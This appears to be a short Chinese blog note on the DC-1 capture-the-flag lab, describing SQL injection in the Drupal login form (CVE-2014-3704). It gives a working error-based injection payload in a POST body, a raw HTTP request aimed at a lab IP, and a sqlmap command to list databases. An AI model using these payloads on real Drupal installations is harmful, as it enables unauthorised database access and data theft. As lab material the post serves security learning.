DC-1 登录框的sql注入

DC-1 登录框的SQL注入 CVE-2014-3704

看了很多文章都没有提及到这个漏洞,偶然在其他博主那里看到还有这个漏洞是其他文章都没有提及到的,做个笔记。

使用POST方法,路径是

/?q=node&destination=node

body:

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a

报错注入,显示数据库名是 drupaldb
在这里插入图片描述
使用sqlmap
new1.txt:

POST /?q=node&destination=node HTTP/1.1
Host: 192.168.10.133
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,*),0)%23]=bob&name[0]=a
python3 .\sqlmap.py -r "C:\Users\zen\Desktop\new1.txt" --dbs --batch

在这里插入图片描述

  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值